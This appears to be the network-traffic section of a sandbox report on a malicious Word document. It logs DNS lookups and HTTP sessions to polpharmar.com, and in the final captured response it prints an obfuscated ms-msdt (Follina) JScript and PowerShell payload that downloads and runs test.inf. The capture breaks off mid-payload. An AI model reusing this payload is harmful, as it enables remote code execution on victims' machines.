Aug 1, 2022 10:49:49.640113115 CEST	80	49172	91.235.116.180	192.168.2.22
Aug 1, 2022 10:49:49.640312910 CEST	49172	80	192.168.2.22	91.235.116.180
Aug 1, 2022 10:49:49.640367985 CEST	49172	80	192.168.2.22	91.235.116.180
Aug 1, 2022 10:49:49.689097881 CEST	80	49172	91.235.116.180	192.168.2.22
Aug 1, 2022 10:49:49.881912947 CEST	49173	80	192.168.2.22	91.235.116.180
Aug 1, 2022 10:49:49.930389881 CEST	80	49173	91.235.116.180	192.168.2.22
Aug 1, 2022 10:49:49.930533886 CEST	49173	80	192.168.2.22	91.235.116.180
Aug 1, 2022 10:49:49.930742979 CEST	49173	80	192.168.2.22	91.235.116.180
Aug 1, 2022 10:49:49.978899002 CEST	80	49173	91.235.116.180	192.168.2.22
Aug 1, 2022 10:49:49.981864929 CEST	80	49173	91.235.116.180	192.168.2.22
Aug 1, 2022 10:49:50.182560921 CEST	49173	80	192.168.2.22	91.235.116.180
Aug 1, 2022 10:49:50.230763912 CEST	80	49173	91.235.116.180	192.168.2.22
Aug 1, 2022 10:49:50.230948925 CEST	49173	80	192.168.2.22	91.235.116.180
Aug 1, 2022 10:49:51.319211960 CEST	49173	80	192.168.2.22	91.235.116.180
Aug 1, 2022 10:49:51.371577978 CEST	80	49173	91.235.116.180	192.168.2.22
Aug 1, 2022 10:49:51.571059942 CEST	49173	80	192.168.2.22	91.235.116.180
Aug 1, 2022 10:49:52.743328094 CEST	49173	80	192.168.2.22	91.235.116.180
Aug 1, 2022 10:49:52.796791077 CEST	80	49173	91.235.116.180	192.168.2.22
Aug 1, 2022 10:49:52.844263077 CEST	49171	80	192.168.2.22	91.235.116.180
Aug 1, 2022 10:49:52.844916105 CEST	49174	80	192.168.2.22	91.235.116.180
Aug 1, 2022 10:49:52.893034935 CEST	80	49171	91.235.116.180	192.168.2.22
Aug 1, 2022 10:49:52.893435955 CEST	80	49174	91.235.116.180	192.168.2.22
Aug 1, 2022 10:49:52.893615007 CEST	49174	80	192.168.2.22	91.235.116.180
Aug 1, 2022 10:49:52.900791883 CEST	49174	80	192.168.2.22	91.235.116.180
Aug 1, 2022 10:49:52.949476957 CEST	80	49174	91.235.116.180	192.168.2.22
Aug 1, 2022 10:49:52.950392962 CEST	80	49174	91.235.116.180	192.168.2.22
Aug 1, 2022 10:49:52.950459957 CEST	80	49174	91.235.116.180	192.168.2.22
Aug 1, 2022 10:49:52.950469017 CEST	80	49174	91.235.116.180	192.168.2.22
Aug 1, 2022 10:49:52.950470924 CEST	49174	80	192.168.2.22	91.235.116.180
Aug 1, 2022 10:49:52.950478077 CEST	80	49174	91.235.116.180	192.168.2.22
Aug 1, 2022 10:49:52.950488091 CEST	80	49174	91.235.116.180	192.168.2.22
Aug 1, 2022 10:49:52.950506926 CEST	80	49174	91.235.116.180	192.168.2.22
Aug 1, 2022 10:49:52.950517893 CEST	49174	80	192.168.2.22	91.235.116.180
Aug 1, 2022 10:49:52.950521946 CEST	80	49174	91.235.116.180	192.168.2.22
Aug 1, 2022 10:49:52.950537920 CEST	80	49174	91.235.116.180	192.168.2.22
Aug 1, 2022 10:49:52.950544119 CEST	49174	80	192.168.2.22	91.235.116.180
Aug 1, 2022 10:49:52.950552940 CEST	80	49174	91.235.116.180	192.168.2.22
Aug 1, 2022 10:49:52.950567007 CEST	80	49174	91.235.116.180	192.168.2.22
Aug 1, 2022 10:49:52.950567961 CEST	49174	80	192.168.2.22	91.235.116.180
Aug 1, 2022 10:49:52.950597048 CEST	49174	80	192.168.2.22	91.235.116.180
Aug 1, 2022 10:49:52.950613976 CEST	49174	80	192.168.2.22	91.235.116.180
Aug 1, 2022 10:49:52.954075098 CEST	49174	80	192.168.2.22	91.235.116.180
Aug 1, 2022 10:49:52.990808010 CEST	49173	80	192.168.2.22	91.235.116.180
Aug 1, 2022 10:49:53.274751902 CEST	49174	80	192.168.2.22	91.235.116.180
Aug 1, 2022 10:49:53.324143887 CEST	80	49174	91.235.116.180	192.168.2.22
Aug 1, 2022 10:49:53.329531908 CEST	49174	80	192.168.2.22	91.235.116.180
Aug 1, 2022 10:49:53.569763899 CEST	49174	80	192.168.2.22	91.235.116.180
Aug 1, 2022 10:49:53.619056940 CEST	80	49174	91.235.116.180	192.168.2.22
Aug 1, 2022 10:49:53.619286060 CEST	49174	80	192.168.2.22	91.235.116.180
Aug 1, 2022 10:49:54.343363047 CEST	49175	80	192.168.2.22	91.235.116.180
Aug 1, 2022 10:49:54.391961098 CEST	80	49175	91.235.116.180	192.168.2.22
Aug 1, 2022 10:49:54.392148018 CEST	49175	80	192.168.2.22	91.235.116.180
Aug 1, 2022 10:49:54.392364979 CEST	49175	80	192.168.2.22	91.235.116.180
Aug 1, 2022 10:49:54.440833092 CEST	80	49175	91.235.116.180	192.168.2.22
Aug 1, 2022 10:49:54.441466093 CEST	80	49175	91.235.116.180	192.168.2.22
Aug 1, 2022 10:49:54.644490957 CEST	49175	80	192.168.2.22	91.235.116.180
Aug 1, 2022 10:49:54.690577030 CEST	80	49175	91.235.116.180	192.168.2.22
Aug 1, 2022 10:49:54.690649033 CEST	49175	80	192.168.2.22	91.235.116.180
Aug 1, 2022 10:49:55.436187983 CEST	49173	80	192.168.2.22	91.235.116.180
Aug 1, 2022 10:49:55.487442970 CEST	80	49173	91.235.116.180	192.168.2.22
Aug 1, 2022 10:49:55.689749002 CEST	49173	80	192.168.2.22	91.235.116.180
Aug 1, 2022 10:49:56.788990974 CEST	49173	80	192.168.2.22	91.235.116.180
Aug 1, 2022 10:49:56.839572906 CEST	80	49173	91.235.116.180	192.168.2.22
Aug 1, 2022 10:49:56.855813026 CEST	49174	80	192.168.2.22	91.235.116.180
Aug 1, 2022 10:49:56.904831886 CEST	80	49174	91.235.116.180	192.168.2.22
Aug 1, 2022 10:49:56.905010939 CEST	49174	80	192.168.2.22	91.235.116.180
Aug 1, 2022 10:49:56.926876068 CEST	49174	80	192.168.2.22	91.235.116.180
Aug 1, 2022 10:49:56.976238966 CEST	80	49174	91.235.116.180	192.168.2.22
Aug 1, 2022 10:49:56.976454020 CEST	49174	80	192.168.2.22	91.235.116.180
Aug 1, 2022 10:49:57.047100067 CEST	49173	80	192.168.2.22	91.235.116.180
Aug 1, 2022 10:49:57.166090012 CEST	49174	80	192.168.2.22	91.235.116.180
Aug 1, 2022 10:49:57.215281963 CEST	80	49174	91.235.116.180	192.168.2.22
Aug 1, 2022 10:49:57.215473890 CEST	49174	80	192.168.2.22	91.235.116.180
Aug 1, 2022 10:49:59.447031021 CEST	80	49175	91.235.116.180	192.168.2.22
Aug 1, 2022 10:49:59.447299957 CEST	49175	80	192.168.2.22	91.235.116.180
Aug 1, 2022 10:49:59.448188066 CEST	49175	80	192.168.2.22	91.235.116.180
Aug 1, 2022 10:49:59.496814013 CEST	80	49175	91.235.116.180	192.168.2.22
Aug 1, 2022 10:50:01.844790936 CEST	80	49173	91.235.116.180	192.168.2.22
Aug 1, 2022 10:50:01.844955921 CEST	49173	80	192.168.2.22	91.235.116.180
Aug 1, 2022 10:50:01.844994068 CEST	49173	80	192.168.2.22	91.235.116.180
Aug 1, 2022 10:50:01.893204927 CEST	80	49173	91.235.116.180	192.168.2.22
Aug 1, 2022 10:50:02.219672918 CEST	80	49174	91.235.116.180	192.168.2.22

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Aug 1, 2022 10:49:38.539911985 CEST	55868	53	192.168.2.22	8.8.8.8
Aug 1, 2022 10:49:38.559703112 CEST	53	55868	8.8.8.8	192.168.2.22
Aug 1, 2022 10:49:44.487778902 CEST	49688	53	192.168.2.22	8.8.8.8
Aug 1, 2022 10:49:44.505176067 CEST	53	49688	8.8.8.8	192.168.2.22
Aug 1, 2022 10:49:44.509357929 CEST	58836	53	192.168.2.22	8.8.8.8
Aug 1, 2022 10:49:44.536066055 CEST	53	58836	8.8.8.8	192.168.2.22
Aug 1, 2022 10:49:49.798683882 CEST	50134	53	192.168.2.22	8.8.8.8
Aug 1, 2022 10:49:49.816215992 CEST	53	50134	8.8.8.8	192.168.2.22
Aug 1, 2022 10:49:49.818392038 CEST	55275	53	192.168.2.22	8.8.8.8
Aug 1, 2022 10:49:49.880886078 CEST	53	55275	8.8.8.8	192.168.2.22
Aug 1, 2022 10:49:54.283454895 CEST	59915	53	192.168.2.22	8.8.8.8
Aug 1, 2022 10:49:54.311333895 CEST	53	59915	8.8.8.8	192.168.2.22
Aug 1, 2022 10:49:54.323168039 CEST	54408	53	192.168.2.22	8.8.8.8
Aug 1, 2022 10:49:54.342415094 CEST	53	54408	8.8.8.8	192.168.2.22

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class
Aug 1, 2022 10:49:38.539911985 CEST	192.168.2.22	8.8.8.8	0xdd01	Standard query (0)	polpharmar.com	A (IP address)	IN (0x0001)
Aug 1, 2022 10:49:44.487778902 CEST	192.168.2.22	8.8.8.8	0x53f0	Standard query (0)	polpharmar.com	A (IP address)	IN (0x0001)
Aug 1, 2022 10:49:44.509357929 CEST	192.168.2.22	8.8.8.8	0x4117	Standard query (0)	polpharmar.com	A (IP address)	IN (0x0001)
Aug 1, 2022 10:49:49.798683882 CEST	192.168.2.22	8.8.8.8	0xdc64	Standard query (0)	polpharmar.com	A (IP address)	IN (0x0001)
Aug 1, 2022 10:49:49.818392038 CEST	192.168.2.22	8.8.8.8	0xbe50	Standard query (0)	polpharmar.com	A (IP address)	IN (0x0001)
Aug 1, 2022 10:49:54.283454895 CEST	192.168.2.22	8.8.8.8	0xb76d	Standard query (0)	polpharmar.com	A (IP address)	IN (0x0001)
Aug 1, 2022 10:49:54.323168039 CEST	192.168.2.22	8.8.8.8	0x5851	Standard query (0)	polpharmar.com	A (IP address)	IN (0x0001)

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	Address	Type	Class
Aug 1, 2022 10:49:38.559703112 CEST	8.8.8.8	192.168.2.22	0xdd01	No error (0)	polpharmar.com	91.235.116.180	A (IP address)	IN (0x0001)
Aug 1, 2022 10:49:44.505176067 CEST	8.8.8.8	192.168.2.22	0x53f0	No error (0)	polpharmar.com	91.235.116.180	A (IP address)	IN (0x0001)
Aug 1, 2022 10:49:44.536066055 CEST	8.8.8.8	192.168.2.22	0x4117	No error (0)	polpharmar.com	91.235.116.180	A (IP address)	IN (0x0001)
Aug 1, 2022 10:49:49.816215992 CEST	8.8.8.8	192.168.2.22	0xdc64	No error (0)	polpharmar.com	91.235.116.180	A (IP address)	IN (0x0001)
Aug 1, 2022 10:49:49.880886078 CEST	8.8.8.8	192.168.2.22	0xbe50	No error (0)	polpharmar.com	91.235.116.180	A (IP address)	IN (0x0001)
Aug 1, 2022 10:49:54.311333895 CEST	8.8.8.8	192.168.2.22	0xb76d	No error (0)	polpharmar.com	91.235.116.180	A (IP address)	IN (0x0001)
Aug 1, 2022 10:49:54.342415094 CEST	8.8.8.8	192.168.2.22	0x5851	No error (0)	polpharmar.com	91.235.116.180	A (IP address)	IN (0x0001)

HTTP Request Dependency Graph

polpharmar.com

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
0	192.168.2.22	49171	91.235.116.180	80	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

Timestamp	kBytes transferred	Direction	Data
Aug 1, 2022 10:49:38.621876955 CEST	0	OUT	OPTIONS / HTTP/1.1 User-Agent: Microsoft Office Protocol Discovery Host: polpharmar.com Content-Length: 0 Connection: Keep-Alive
Aug 1, 2022 10:49:38.674829960 CEST	0	IN	HTTP/1.1 200 OK Date: Mon, 01 Aug 2022 08:49:38 GMT Server: Apache Allow: GET,POST,OPTIONS,HEAD Content-Length: 0 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: httpd/unix-directory

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
1	192.168.2.22	49172	91.235.116.180	80	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

Timestamp	kBytes transferred	Direction	Data
Aug 1, 2022 10:49:44.586869001 CEST	1	OUT	HEAD /test.html HTTP/1.1 Connection: Keep-Alive User-Agent: Microsoft Office Existence Discovery Host: polpharmar.com
Aug 1, 2022 10:49:44.636255026 CEST	2	IN	HTTP/1.1 200 OK Date: Mon, 01 Aug 2022 08:49:44 GMT Server: Apache Last-Modified: Sun, 31 Jul 2022 09:45:54 GMT Accept-Ranges: bytes Content-Length: 12744 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html
Aug 1, 2022 10:49:44.884654045 CEST	2	IN	HTTP/1.1 200 OK Date: Mon, 01 Aug 2022 08:49:44 GMT Server: Apache Last-Modified: Sun, 31 Jul 2022 09:45:54 GMT Accept-Ranges: bytes Content-Length: 12744 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
2	192.168.2.22	49173	91.235.116.180	80	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

Timestamp	kBytes transferred	Direction	Data
Aug 1, 2022 10:49:49.930742979 CEST	3	OUT	OPTIONS / HTTP/1.1 Connection: Keep-Alive User-Agent: Microsoft-WebDAV-MiniRedir/6.1.7601 translate: f Host: polpharmar.com
Aug 1, 2022 10:49:49.981864929 CEST	3	IN	HTTP/1.1 200 OK Date: Mon, 01 Aug 2022 08:49:49 GMT Server: Apache Allow: GET,POST,OPTIONS,HEAD Content-Length: 0 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: httpd/unix-directory
Aug 1, 2022 10:49:50.230763912 CEST	4	IN	HTTP/1.1 200 OK Date: Mon, 01 Aug 2022 08:49:49 GMT Server: Apache Allow: GET,POST,OPTIONS,HEAD Content-Length: 0 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: httpd/unix-directory
Aug 1, 2022 10:49:51.371577978 CEST	4	IN	HTTP/1.1 405 Method Not Allowed Date: Mon, 01 Aug 2022 08:49:51 GMT Server: Apache Allow: GET,POST,OPTIONS,HEAD Content-Length: 348 Keep-Alive: timeout=5, max=99 Connection: Keep-Alive Content-Type: text/html; charset=iso-8859-1 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 35 20 4d 65 74 68 6f 64 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4d 65 74 68 6f 64 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 6d 65 74 68 6f 64 20 47 45 54 20 69 73 20 6e 6f 74 20 61 6c 6c 6f 77 65 64 20 66 6f 72 20 74 68 69 73 20 55 52 4c 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 35 20 4d 65 74 68 6f 64 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>405 Method Not Allowed</title></head><body><h1>Method Not Allowed</h1><p>The requested method GET is not allowed for this URL.</p><p>Additionally, a 405 Method Not Allowederror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
Aug 1, 2022 10:49:52.796791077 CEST	5	IN	HTTP/1.1 405 Method Not Allowed Date: Mon, 01 Aug 2022 08:49:52 GMT Server: Apache Allow: GET,POST,OPTIONS,HEAD Content-Length: 348 Keep-Alive: timeout=5, max=98 Connection: Keep-Alive Content-Type: text/html; charset=iso-8859-1 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 35 20 4d 65 74 68 6f 64 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4d 65 74 68 6f 64 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 6d 65 74 68 6f 64 20 47 45 54 20 69 73 20 6e 6f 74 20 61 6c 6c 6f 77 65 64 20 66 6f 72 20 74 68 69 73 20 55 52 4c 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 35 20 4d 65 74 68 6f 64 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>405 Method Not Allowed</title></head><body><h1>Method Not Allowed</h1><p>The requested method GET is not allowed for this URL.</p><p>Additionally, a 405 Method Not Allowederror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
Aug 1, 2022 10:49:55.487442970 CEST	23	IN	HTTP/1.1 405 Method Not Allowed Date: Mon, 01 Aug 2022 08:49:55 GMT Server: Apache Allow: GET,POST,OPTIONS,HEAD Content-Length: 348 Keep-Alive: timeout=5, max=97 Connection: Keep-Alive Content-Type: text/html; charset=iso-8859-1 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 35 20 4d 65 74 68 6f 64 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4d 65 74 68 6f 64 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 6d 65 74 68 6f 64 20 47 45 54 20 69 73 20 6e 6f 74 20 61 6c 6c 6f 77 65 64 20 66 6f 72 20 74 68 69 73 20 55 52 4c 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 35 20 4d 65 74 68 6f 64 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>405 Method Not Allowed</title></head><body><h1>Method Not Allowed</h1><p>The requested method GET is not allowed for this URL.</p><p>Additionally, a 405 Method Not Allowederror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
Aug 1, 2022 10:49:56.839572906 CEST	24	IN	HTTP/1.1 405 Method Not Allowed Date: Mon, 01 Aug 2022 08:49:56 GMT Server: Apache Allow: GET,POST,OPTIONS,HEAD Content-Length: 348 Keep-Alive: timeout=5, max=96 Connection: Keep-Alive Content-Type: text/html; charset=iso-8859-1 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 35 20 4d 65 74 68 6f 64 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4d 65 74 68 6f 64 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 6d 65 74 68 6f 64 20 47 45 54 20 69 73 20 6e 6f 74 20 61 6c 6c 6f 77 65 64 20 66 6f 72 20 74 68 69 73 20 55 52 4c 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 35 20 4d 65 74 68 6f 64 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>405 Method Not Allowed</title></head><body><h1>Method Not Allowed</h1><p>The requested method GET is not allowed for this URL.</p><p>Additionally, a 405 Method Not Allowederror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
3	192.168.2.22	49174	91.235.116.180	80	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

Timestamp	kBytes transferred	Direction	Data
Aug 1, 2022 10:49:52.900791883 CEST	6	OUT	GET /test.html HTTP/1.1 Accept: / User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; ms-office; MSOffice 14) UA-CPU: AMD64 Accept-Encoding: gzip, deflate Host: polpharmar.com Connection: Keep-Alive
Aug 1, 2022 10:49:52.950392962 CEST	7	IN	HTTP/1.1 200 OK Date: Mon, 01 Aug 2022 08:49:52 GMT Server: Apache Last-Modified: Sun, 31 Jul 2022 09:45:54 GMT Accept-Ranges: bytes Content-Length: 12744 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html Data Raw: 3c 21 64 4f 63 54 79 70 45 20 48 54 6d 6c 3e 0d 0a 0d 0a 3c 48 54 6d 4c 3e 0d 0a 0d 0a 3c 62 6f 44 59 3e 0d 0a 0d 0a 3c 53 43 72 49 70 54 20 74 79 70 45 3d 22 74 65 78 74 2f 4a 53 63 72 69 70 74 22 3e 0d 0a 0d 0a 0d 0a 0d 0a 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 20 3d 20 22 6d 22 20 20 2b 20 22 73 2d 6d 73 64 74 3a 2f 22 20 20 2b 20 22 49 44 22 20 20 2b 20 22 20 22 20 2b 20 22 50 63 77 64 69 41 67 6e 4f 53 54 69 22 20 20 2b 20 22 43 22 20 20 2b 20 22 20 22 20 2b 20 22 2d 73 4b 69 22 20 20 2b 20 22 50 22 20 20 2b 20 22 20 22 20 2b 20 22 66 6f 72 22 20 20 2b 20 22 43 22 20 20 2b 20 22 65 22 20 20 2b 20 22 20 22 20 2b 20 22 2d 70 41 72 41 22 20 20 2b 20 22 6d 22 20 20 2b 20 22 20 22 20 2b 20 22 5c 22 22 20 2b 20 22 49 54 5f 52 65 42 52 6f 77 73 65 66 6f 72 66 69 4c 22 20 20 2b 20 22 45 22 20 20 2b 20 22 3d 22 20 20 2b 20 22 23 4a 61 32 59 22 20 2b 20 22 20 22 20 2b 20 22 49 54 5f 4c 61 75 6e 63 68 4d 65 74 68 6f 64 3d 43 6f 6e 74 65 78 74 22 20 20 2b 20 22 4d 65 6e 75 22 20 20 2b 20 22 20 22 20 2b 20 22 49 54 5f 42 72 6f 77 73 65 46 6f 72 46 69 22 20 20 2b 20 22 6c 22 20 20 2b 20 22 65 3d 22 20 20 2b 20 22 57 35 41 24 28 22 20 2b 20 22 49 65 78 28 24 28 49 65 58 28 27 5b 73 59 53 54 65 6d 2e 74 65 58 74 2e 65 6e 43 4f 44 69 6e 47 5d 27 2b 5b 63 48 61 72 5d 35 38 2b 5b 63 68 41 52 5d 35 38 2b 27 75 54 66 38 2e 67 65 54 53 74 52 69 4e 67 28 5b 73 59 53 74 65 6d 2e 43 6f 4e 56 45 72 54 5d 27 2b 5b 63 68 61 72 5d 35 38 2b 22 20 20 2b 20 22 5b 63 68 61 72 5d 30 78 33 41 2b 27 66 52 6f 6d 62 41 53 65 36 34 53 74 52 49 4e 67 28 27 2b 5b 43 48 61 72 5d 30 58 32 32 2b 27 55 31 52 50 63 43 31 51 63 6b 39 6a 5a 58 4e 54 49 43 31 6d 62 31 4a 6a 5a 53 41 74 54 6d 46 4e 5a 53 41 6e 62 58 4e 6b 64 43 63 37 4a 45 74 5a 49 44 30 67 59 57 52 6b 4c 58 52 5a 55 45 55 67 4c 57 31 6c 62 55 4a 6c 63 6d 52 46 52 6d 6c 75 61 56 52 4a 54 30 34 67 4a 31 74 45 62 47 78 4a 62 58 42 76 63 6e 51 6f 49 6c 56 53 62 47 31 76 54 69 35 45 62 45 77 69 4c 43 42 44 61 47 46 79 55 32 56 30 49 44 30 67 51 32 68 68 63 6c 4e 6c 64 43 35 56 62 6d 6c 6a 62 32 52 6c 4b 56 31 77 64 57 4a 73 61 57 4d 67 63 33 52 68 64 47 6c 6a 49 47 56 34 64 47 56 79 62 69 42 4a 62 6e 52 51 64 48 49 67 56 56 4a 4d 52 47 39 33 62 6d 78 76 59 57 52 55 62 30 5a 70 62 47 55 6f 53 57 35 30 55 48 52 79 49 46 49 73 63 33 52 79 61 57 35 6e 49 47 4a 70 54 43 78 7a 64 48 4a 70 62 6d 63 67 64 58 64 6c 4c 48 56 70 62 6e 51 67 55 6d 35 76 4c 45 6c 75 64 46 42 30 63 69 42 31 52 79 6b 37 4a 79 41 74 62 6b 46 74 52 53 41 69 57 58 5a 52 49 69 41 74 54 6b 46 22 20 20 2b 20 22 74 52 56 4e 51 59 55 4e 6c 49 45 68 4c 5a 79 41 74 55 47 46 7a 63 31 52 6f 63 6e 55 37 49 43 52 4c 57 54 6f 36 56 56 4a 4d 52 47 39 33 62 6d 78 76 59 57 52 55 62 30 5a 70 62 47 55 6f 4d 43 77 69 61 48 52 30 63 44 6f 76 4c 33 42 76 62 48 42 6f 59 58 4a 74 59 58 49 75 59 32 39 74 4c 33 52 6c 63 33 51 75 61 57 35 6d 49 69 77 69 4a 47 56 75 64 6a 70 42 55 46 42 45 51 56 52 42 58 48 52 6c 63 33 51 75 61 57 35 6d 49 69 77 77 4c 44 41 70 4f 31 4e 55 59 58 4a 30 4c 58 4e 4d 52 57 56 51 4b 44 4d 70 4f 31 4a 31 62 6b 52 73 62 44 4d 79 4c 6b 56 59 5a 53 42 68 5a 48 5a 77 51 57 4e 4c 4c 6d 52 73 54 43 78 4d 59 58 56 75 59 32 68 4a 54 6b 5a 54 5a 57 4e 30 61 57 39 75 52 58 67 67 49 69 52 6c 54 6c 59 36 51 56 42 51 52 45 46 55 51 56 78 30 5a 58 4e Data Ascii: <!dOcTypE HTml><HTmL><boDY><SCrIpT typE="text/JScript">location.href = "m" + "s-msdt:/" + "ID" + " " + "PcwdiAgnOSTi" + "C" + " " + "-sKi" + "P" + " " + "for" + "C" + "e" + " " + "-pArA" + "m" + " " + "\"" + "IT_ReBRowseforfiL" + "E" + "=" + "#Ja2Y" + " " + "IT_LaunchMethod=Context" + "Menu" + " " + "IT_BrowseForFi" + "l" + "e=" + "W5A$(" + "Iex($(IeX('[sYSTem.teXt.enCODinG]'+[cHar]58+[chAR]58+'uTf8.geTStRiNg([sYStem.CoNVErT]'+[char]58+" + 